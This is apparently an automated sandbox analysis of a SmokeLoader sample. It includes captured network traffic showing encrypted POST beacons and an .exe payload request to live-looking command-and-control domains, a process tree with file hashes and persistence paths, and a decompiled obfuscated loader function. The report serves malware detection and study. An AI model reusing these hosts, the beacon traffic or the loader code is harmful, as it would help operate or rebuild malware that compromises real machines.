Dec 28, 2021 13:54:53.624316931 CET	1553	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kfdyfm.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 233 Host: host-data-coin-11.com
Dec 28, 2021 13:54:53.624475956 CET	1553	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 9b 66 5d 02 c8 a1 c1 64 27 af ca 1e Data Ascii: Nz1@D6YiwmDu$f]d'.Wy>iyd8?Cf`=="/O25Y55Qy UH^zACR{P)/}yI:GbCLVfNV*\|N[<\|WYV5
Dec 28, 2021 13:54:54.195750952 CET	1554	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:54:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49795	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:54:55.598448038 CET	1555	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jealulibe.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 145 Host: host-data-coin-11.com
Dec 28, 2021 13:54:55.598453045 CET	1555	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 98 66 5d 02 c8 a1 c1 64 2e b1 8b 26 Data Ascii: Nz1@D6YiwmDu$f]d.&_hUS44;kCZ%Q?-%"<WO0$}w
Dec 28, 2021 13:54:56.155267954 CET	1556	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:54:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49796	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:54:56.359143019 CET	1557	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://axnxlm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: host-data-coin-11.com
Dec 28, 2021 13:54:56.359200001 CET	1557	OUT	Data Raw: 10 87 f1 99 1a 85 d0 c7 b8 4e 7a 31 0c c2 97 8e 40 14 d9 44 a0 36 1d 9e c3 e7 de f1 fe a6 92 83 1d c7 59 a6 1f 69 cd e2 ea de f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 85 de 99 66 5d 02 c8 a1 c1 64 1f 86 de 05 Data Ascii: Nz1@D6YiwmDu$f]d,by$W`AH?b}2)Gwr"(7ZCwbs._ZI1FC+SQTn!kWO`w#ojFJQ]B4iCfs]bX{}*IvT)
Dec 28, 2021 13:54:56.915194988 CET	1558	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:54:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef ae 8a 70 bc 57 dd 42 d6 f7 23 8c 21 e6 c3 93 50 2c e2 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9KpWB#!P,c0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49797	47.251.11.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 28, 2021 13:54:57.251928091 CET	1558	OUT	GET /files/5376_1640094939_1074.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: data-host-coin-8.com
Dec 28, 2021 13:54:57.802864075 CET	1559	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 28 Dec 2021 12:54:57 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Data Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 61 74 61 2d 68 6f 73 74 2d 63 6f 69 6e 2d 38 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at data-host-coin-8.com Port 80</address></body></html>0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: UZ6FEqlix4.exe PID: 6160 Parent PID: 5708

General

Start time:	13:54:05
Start date:	28/12/2021
Path:	C:\Users\user\Desktop\UZ6FEqlix4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\UZ6FEqlix4.exe"
Imagebase:	0x400000
File size:	339456 bytes
MD5 hash:	5E0ED8966761E70EE0B8DCD141AAFB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: UZ6FEqlix4.exe PID: 6384 Parent PID: 6160

General

Start time:	13:54:07
Start date:	28/12/2021
Path:	C:\Users\user\Desktop\UZ6FEqlix4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\UZ6FEqlix4.exe"
Imagebase:	0x400000
File size:	339456 bytes
MD5 hash:	5E0ED8966761E70EE0B8DCD141AAFB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 6384

General

Start time:	13:54:13
Start date:	28/12/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: eveggtb PID: 7080 Parent PID: 968

General

Start time:	13:54:47
Start date:	28/12/2021
Path:	C:\Users\user\AppData\Roaming\eveggtb
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\eveggtb
Imagebase:	0x400000
File size:	339456 bytes
MD5 hash:	5E0ED8966761E70EE0B8DCD141AAFB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 20%, Metadefender, Browse Detection: 67%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: eveggtb PID: 4720 Parent PID: 7080

General

Start time:	13:54:49
Start date:	28/12/2021
Path:	C:\Users\user\AppData\Roaming\eveggtb
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\eveggtb
Imagebase:	0x400000
File size:	339456 bytes
MD5 hash:	5E0ED8966761E70EE0B8DCD141AAFB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: 411F.exe PID: 6684 Parent PID: 3424

General

Start time:	13:56:03
Start date:	28/12/2021
Path:	C:\Users\user\AppData\Local\Temp\411F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\411F.exe
Imagebase:	0x400000
File size:	339456 bytes
MD5 hash:	5E0ED8966761E70EE0B8DCD141AAFB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 411F.exe PID: 5956 Parent PID: 6684

General

Start time:	13:56:06
Start date:	28/12/2021
Path:	C:\Users\user\AppData\Local\Temp\411F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\411F.exe
Imagebase:	0x400000
File size:	339456 bytes
MD5 hash:	5E0ED8966761E70EE0B8DCD141AAFB4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: UZ6FEqlix4.exe PID: 6160 Parent PID: 5708 UZ6FEqlix4.exeCOMMON

Executed Functions

Function 0041CA09, Relevance: 205.2, APIs: 89, Strings: 28, Instructions: 483
timefilestringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041CA09(void* __edx, struct _OVERLAPPED* _a4, long _a8, long _a12, long _a16, struct _INPUT_RECORD _a20, struct _CRITICAL_SECTION _a40, struct _CRITICAL_SECTION _a44, char _a52, char _a60, intOrPtr _a80, struct _WIN32_FIND_DATAA _a112, int _a120, int _a124, char _a140, char _a400, void _a432, void _a456, char _a460, char _a1460, char _a1464, char _a1469, void _a1484, short _a3508, void _a3528, char _a3532, short _a5560, short _a5580) {
				struct _OVERLAPPED _v8;
				void* _v10;
				struct _COORD _v12;
				WCHAR* _v16;
				long _v20;
				void _v24;
				short _v28;
				void* __ebp;
				intOrPtr _t56;
				CHAR* _t58;
				intOrPtr _t85;
				void* _t174;
				void* _t177;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t186;
				void* _t187;
				void* _t195;

				E00420E00(0x1dcc);
				if( *0x4c4ea4 == 0x177) {
					E00423D60(_t177, 0);
					E00423D10(_t177, 0, 0);
					_t195 = _t195 + 0xc;
					_push(1);
					_push(3);
					E0041E2AD( &_a140);
					E0041D518( &_a60);
					_a60 = 0x401c3c;
					_a120 = 0;
					_a124 = 0;
					_t58 = E004237B0(0);
				}
				_t174 = 0;
				L3:
				L3:
				if( *0x4c4ea4 == 0x47) {
					SetCurrentDirectoryW(0);
					EnterCriticalSection( &_a20);
					GlobalAddAtomW(L"semexubiwuhanivim");
					UnlockFile(0, 0, 0, 0, 0);
					WriteProfileStringA("Tog bemal zumesuyamop zemim xuzaxarurolu", "Sugoficalaluj tupemicoba", "Kib revomuvufibo miyif yufobeh");
					GetFullPathNameA(0, 0,  &_a3532, 0);
					__imp__FindNextVolumeMountPointA(0,  &_a460, 0);
					GetCompressedFileSizeW(L"Zumohodove linucasuxadefi dunixoxehevavo",  &(_v8.InternalHigh));
					_v12 = 0;
					asm("stosw");
					FillConsoleOutputCharacterA(0, 0, 0, _v12,  &_v8);
					SetNamedPipeHandleState(0, 0, 0, 0);
					lstrcpynA( &_a1469, 0, 0);
					FatalAppExitA(0, 0);
					__imp__GetConsoleAliasesLengthA(0);
					GetProcessTimes(0, 0, 0, 0, 0);
					__imp__ChangeTimerQueueTimer(0, 0, 0, 0);
					SetWaitableTimer(0, 0, 0, 0, 0, 0);
					VirtualLock(0, 0);
					GetSystemPowerStatus(0);
					SignalObjectAndWait(0, 0, 0, 0);
					WaitForMultipleObjectsEx(0, 0, 0, 0, 0);
					_t58 = OpenMutexA(0, 0, "hupezigisilegurazemalugisif");
				}
				if(_t174 == 0x69c) {
					goto L8;
				}
				_t174 = _t174 + 1;
				if(_t174 < 0x1138481) {
					goto L3;
				} else {
				}
				L9:
				_t182 = 0;
				do {
					if(_t182 < 0x5e3) {
						GetLastError();
					}
					if( *0x4c4ea4 == 0x6b) {
						_t58 = HeapValidate(0, 0, 0);
					}
					 *0x4c4490 = 0;
					if(_t182 > 0x26f25 && _a4 != 0xdfe68a && _a80 != 0xdf59ea &&  *0x4c4ea4 == 0xfc5) {
						GetComputerNameW( &_a1484,  &_a4);
						_t58 = OpenMutexW(0, 0, L"buvamis");
					}
					_t182 = _t182 + 1;
				} while (_t182 < 0x17635b17);
				_t183 = 0;
				do {
					if(_t183 == 0x3fa) {
						 *0x4c4ea4 =  *0x4c4ea4 + 0x12336;
					}
					if( *0x4c4ea4 == 0x65) {
						TlsAlloc();
						ClearCommBreak(0);
						GetConsoleScreenBufferInfo(0, 0);
						OpenSemaphoreA(0, 0, "Ragotetu capuhagita wiweyufubub");
						FreeEnvironmentStringsA(0);
						GetWriteWatch(0, 0, 0, 0, 0, 0);
						__imp__DeleteTimerQueueTimer(0, 0, 0);
						GetDevicePowerState(0, 0);
						__imp__ProcessIdToSessionId(0, 0);
						EnumSystemLocalesW(0, 0);
						GetSystemTimeAdjustment(0, 0, 0);
						SetCommState(0, 0);
						LocalShrink(0, 0);
						WriteConsoleInputW(0, 0, 0,  &_v20);
						__imp__GetConsoleAliasExesLengthW();
						FreeConsole();
						SearchPathW(L"Nixiyebepicus yahidomawer zepuzetivum", L"Tibo ruyelayoyadi kowaxi joca nag", L"Hukim defufidum dabopay ziracenuweg", 0,  &_a3508,  &_v16);
						FlushConsoleInputBuffer(0);
						__imp__GetVolumePathNameA(0,  &_a1460, 0);
						GetConsoleCP();
						MoveFileExA("jeg", "yufikupamubukizunubijisalomusukafawenuveticimoc", 0);
						LockFileEx(0, 0, 0, 0, 0, 0);
						__imp__ReplaceFileA("xogoruleyowukimutoxul", "rozovejusec", 0, 0, 0, 0);
						_t58 = lstrcpyA( &_a400, "Vidizotina tufurig warixolefulig");
						__imp__SetFileShortNameA(0, 0);
					}
					_t183 = _t183 + 1;
				} while (_t183 < 0x485ceb);
				E0041C7CB(_t58);
				_t184 = 0x56a5e7;
				do {
					if( *0x4c4ea4 == 0x105) {
						GetThreadLocale();
					}
					_t184 = _t184 - 1;
				} while (_t184 != 0);
				_v8.Offset = 0;
				do {
					if( *0x4c4ea4 == 0xfd) {
						FreeEnvironmentStringsA(0);
					}
					if(_v8.Offset == 0x3c58) {
						_t85 =  *0x447680; // 0x3f8cca
						 *0x4c4ea8 = _t85;
					}
					if( *0x4c4ea4 == 0x23) {
						CreateSemaphoreA(0, 0, 0, 0);
						SetLocalTime(0);
						FindResourceExA(0, 0, 0, 0);
						GetQueuedCompletionStatus(0,  &_a16,  &_a8,  &_a4, 0);
						CreateSemaphoreA(0, 0, 0, 0);
						GetNumberFormatW(0, 0, 0, 0,  &_a5580, 0);
						PeekConsoleInputA(0,  &_a20, 0,  &_a12);
						CreateIoCompletionPort(0, 0, 0, 0);
						GetProcAddress(0, 0);
						HeapUnlock(0);
						GetFileAttributesExW(L"Hanowopede", 0,  &_a1484);
						GetPrivateProfileStructW(0, 0,  &_a456, 0, 0);
						TryEnterCriticalSection( &_a40);
						GetPrivateProfileStructA(0, 0,  &_a3528, 0, 0);
						WritePrivateProfileSectionW(0, 0, 0);
						GetPrivateProfileSectionW(0, 0, 0, 0);
						SetSystemTimeAdjustment(0, 0);
					}
					_v8.Offset = _v8.Offset + 1;
				} while (_v8.Offset < 0xe6a95);
				_t186 = 0;
				if( *0x4c4ea4 > 0) {
					do {
						E0041AA72(_t186);
						if( *0x4c4ea4 == 0xc66) {
							InterlockedIncrement( &_a12);
						}
						_t186 = _t186 + 1;
					} while (_t186 <  *0x4c4ea4);
				}
				_t187 = 0;
				do {
					if(_t187 == 0x26) {
						E0041ABC0();
					}
					_t187 = _t187 + 1;
				} while (_t187 < 0x3dc4b7);
				E0041C7DF(); // executed
				if( *0x4c4ea4 == 0x1d) {
					WriteConsoleW(0, 0, 0,  &_a12, 0);
					EndUpdateResourceA(0, 0);
					DefineDosDeviceW(0, 0, 0);
					TryEnterCriticalSection( &_a44);
					InterlockedExchange( &_a16, 0);
					__imp__SetFirmwareEnvironmentVariableA("Gexu wegunisozegojab jadiwopunuj xoludefowojadur lucaza", "Zajin guligoy zutik", 0, 0);
					__imp__CreateActCtxA( &_a52);
					lstrcatW( &_a5560, 0);
					WriteProfileStringA("Noheraxopetat jokowugalew xahosuxahexo xofihumozu cifan", "Zel coyicuzemawurip cuyuluda", "Leyajiziredat sovoxatuyuk");
					TerminateThread(0, 0);
					__imp__GetSystemWow64DirectoryA( &_a1464, 0);
					GetConsoleMode( &_v24, 0);
					_v8.Internal = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					WriteFile(0,  &_a432, 0,  &_v20,  &_v8);
					lstrcmpA("Hocukuwamoyaso wabig", "Rusipoca hutujijini bivopi fopuhatuve wadag");
					FindFirstFileA("Cen lumagocatulesak",  &_a112);
					DebugBreak();
					GetStringTypeA(0, 0, "Reyahivi cekojer koxudarinajih jadage", 0,  &_v28);
				}
				return 0;
				L8:
				_t56 =  *0x44768c; // 0xffffd17a
				 *0x4c4ea4 = _t56;
				goto L9;
			}

0x0041ca0e
0x0041ca20
0x0041ca23
0x0041ca2a
0x0041ca2f
0x0041ca32
0x0041ca34
0x0041ca3d
0x0041ca46
0x0041ca4c
0x0041ca54
0x0041ca5b
0x0041ca62
0x0041ca62
0x0041ca6a
0x00000000
0x0041ca6c
0x0041ca73
0x0041ca7a
0x0041ca85
0x0041ca90
0x0041ca9b
0x0041cab0
0x0041cac1
0x0041cad1
0x0041cae1
0x0041cae9
0x0041caf2
0x0041cb00
0x0041cb0a
0x0041cb1a
0x0041cb22
0x0041cb29
0x0041cb34
0x0041cb3e
0x0041cb4a
0x0041cb52
0x0041cb59
0x0041cb63
0x0041cb6e
0x0041cb7b
0x0041cb7b
0x0041cb87
0x00000000
0x00000000
0x0041cb89
0x0041cb90
0x00000000
0x00000000
0x0041cb96
0x0041cba2
0x0041cba2
0x0041cba4
0x0041cbaa
0x0041cbac
0x0041cbac
0x0041cbb9
0x0041cbbe
0x0041cbbe
0x0041cbc4
0x0041cbd0
0x0041cbff
0x0041cc0c
0x0041cc0c
0x0041cc12
0x0041cc13
0x0041cc21
0x0041cc23
0x0041cc29
0x0041cc2b
0x0041cc2b
0x0041cc3c
0x0041cc42
0x0041cc49
0x0041cc51
0x0041cc5e
0x0041cc65
0x0041cc6d
0x0041cc76
0x0041cc7e
0x0041cc86
0x0041cc8e
0x0041cc97
0x0041cc9f
0x0041cca7
0x0041ccb5
0x0041ccbb
0x0041ccc1
0x0041cce4
0x0041cceb
0x0041ccfb
0x0041cd01
0x0041cd12
0x0041cd1e
0x0041cd32
0x0041cd45
0x0041cd4d
0x0041cd4d
0x0041cd53
0x0041cd54
0x0041cd60
0x0041cd65
0x0041cd6a
0x0041cd74
0x0041cd76
0x0041cd76
0x0041cd7c
0x0041cd7c
0x0041cd8b
0x0041cd8f
0x0041cd99
0x0041cd9c
0x0041cd9c
0x0041cda6
0x0041cda8
0x0041cdad
0x0041cdad
0x0041cdb9
0x0041cdc3
0x0041cdc6
0x0041cdd0
0x0041cde7
0x0041cdf1
0x0041ce00
0x0041ce12
0x0041ce1c
0x0041ce24
0x0041ce2b
0x0041ce3f
0x0041ce51
0x0041ce5c
0x0041ce6a
0x0041ce73
0x0041ce7d
0x0041ce85
0x0041ce85
0x0041ce8b
0x0041ce8f
0x0041ce9d
0x0041cea5
0x0041cea7
0x0041cea8
0x0041ceb7
0x0041cebe
0x0041cebe
0x0041cec4
0x0041cec5
0x0041cea7
0x0041cecd
0x0041cecf
0x0041ced2
0x0041ced4
0x0041ced4
0x0041ced9
0x0041ceda
0x0041cee2
0x0041ceee
0x0041cefd
0x0041cf05
0x0041cf0e
0x0041cf19
0x0041cf21
0x0041cf33
0x0041cf3e
0x0041cf4d
0x0041cf62
0x0041cf6a
0x0041cf79
0x0041cf85
0x0041cf8d
0x0041cf95
0x0041cf96
0x0041cf97
0x0041cf98
0x0041cfad
0x0041cfbd
0x0041cfd0
0x0041cfd6
0x0041cfe9
0x0041cfe9
0x0041cffb
0x0041cb98
0x0041cb98
0x0041cb9d
0x00000000

APIs

__wremove.LIBCMTD ref: 0041CA23

Part of subcall function 00423D60: DeleteFileA.KERNEL32(?), ref: 00423D6A
Part of subcall function 00423D60: GetLastError.KERNEL32 ref: 00423D74
Part of subcall function 00423D60: __dosmaperr.LIBCMTD ref: 00423D90

__wrename.LIBCMTD ref: 0041CA2A

Part of subcall function 00423D10: MoveFileA.KERNEL32(?,?), ref: 00423D1E
Part of subcall function 00423D10: GetLastError.KERNEL32 ref: 00423D28
Part of subcall function 00423D10: __dosmaperr.LIBCMTD ref: 00423D44

Part of subcall function 0041E2AD: __EH_prolog.LIBCMT ref: 0041E2B2

Part of subcall function 0041D518: __EH_prolog.LIBCMT ref: 0041D51D
Part of subcall function 0041D518: std::_Mutex::_Mutex.LIBCPMTD ref: 0041D532
Part of subcall function 0041D518: new.LIBCPMTD ref: 0041D54A
Part of subcall function 0041D518: std::locale::locale.LIBCPMT ref: 0041D558

SetCurrentDirectoryW.KERNEL32(00000000), ref: 0041CA7A
EnterCriticalSection.KERNEL32(?), ref: 0041CA85
GlobalAddAtomW.KERNEL32 ref: 0041CA90
UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041CA9B
WriteProfileStringA.KERNEL32(Tog bemal zumesuyamop zemim xuzaxarurolu,Sugoficalaluj tupemicoba,Kib revomuvufibo miyif yufobeh), ref: 0041CAB0
GetFullPathNameA.KERNEL32(00000000,00000000,?,00000000), ref: 0041CAC1
FindNextVolumeMountPointA.KERNEL32(00000000,?,00000000), ref: 0041CAD1
GetCompressedFileSizeW.KERNEL32(Zumohodove linucasuxadefi dunixoxehevavo,?), ref: 0041CAE1
FillConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 0041CB00
SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041CB0A
lstrcpynA.KERNEL32(?,00000000,00000000), ref: 0041CB1A
FatalAppExitA.KERNEL32(00000000,00000000), ref: 0041CB22
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041CB29
GetProcessTimes.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041CB34
ChangeTimerQueueTimer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041CB3E
SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041CB4A
VirtualLock.KERNEL32(00000000,00000000), ref: 0041CB52
GetSystemPowerStatus.KERNEL32 ref: 0041CB59
SignalObjectAndWait.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041CB63
WaitForMultipleObjectsEx.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041CB6E
OpenMutexA.KERNEL32 ref: 0041CB7B
GetLastError.KERNEL32 ref: 0041CBAC
HeapValidate.KERNEL32(00000000,00000000,00000000), ref: 0041CBBE
GetComputerNameW.KERNEL32 ref: 0041CBFF
OpenMutexW.KERNEL32(00000000,00000000,buvamis), ref: 0041CC0C
TlsAlloc.KERNEL32 ref: 0041CC42
ClearCommBreak.KERNEL32(00000000), ref: 0041CC49
GetConsoleScreenBufferInfo.KERNEL32(00000000,00000000), ref: 0041CC51
OpenSemaphoreA.KERNEL32 ref: 0041CC5E
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041CC65
GetWriteWatch.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041CC6D
DeleteTimerQueueTimer.KERNEL32(00000000,00000000,00000000), ref: 0041CC76
GetDevicePowerState.KERNEL32(00000000,00000000), ref: 0041CC7E
ProcessIdToSessionId.KERNEL32(00000000,00000000), ref: 0041CC86
EnumSystemLocalesW.KERNEL32(00000000,00000000), ref: 0041CC8E
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 0041CC97
SetCommState.KERNEL32(00000000,00000000), ref: 0041CC9F
LocalShrink.KERNEL32(00000000,00000000), ref: 0041CCA7
WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 0041CCB5
GetConsoleAliasExesLengthW.KERNEL32 ref: 0041CCBB
FreeConsole.KERNEL32 ref: 0041CCC1
SearchPathW.KERNEL32(Nixiyebepicus yahidomawer zepuzetivum,Tibo ruyelayoyadi kowaxi joca nag,Hukim defufidum dabopay ziracenuweg,00000000,?,?), ref: 0041CCE4
FlushConsoleInputBuffer.KERNEL32(00000000), ref: 0041CCEB
GetVolumePathNameA.KERNEL32 ref: 0041CCFB
GetConsoleCP.KERNEL32 ref: 0041CD01
